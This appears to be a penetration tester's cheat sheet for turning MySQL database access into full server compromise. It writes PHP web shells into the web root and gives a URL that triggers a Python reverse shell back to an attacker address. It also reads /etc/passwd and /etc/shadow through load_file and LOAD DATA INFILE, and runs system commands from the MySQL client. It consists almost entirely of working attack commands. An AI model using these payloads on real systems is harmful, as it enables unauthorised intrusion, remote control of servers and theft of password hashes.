# From mysql session to reverse shell
select "<?php system($_GET['cmd']); ?>" into outfile '/var/www/shell.php';
select "<?php shell_exec($_GET['cmd']); ?>" into outfile '/var/www/shell.php';
select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/shell.php';

http://192.168.10.6/index.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.5",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Read and write files from a MySQL session
select load_file('/etc/password');
select load_file('/etc/passwd') into outfile '/var/www/passwd';

# Debug file read permission from a MySQL session
create table foo (file varchar(1000));
load data infile '/etc/shadow' into table foo fields terminated by '\n';
select * from foo into outfile '/tmp/foo';

# Run system commands from a MySQL session
\! id

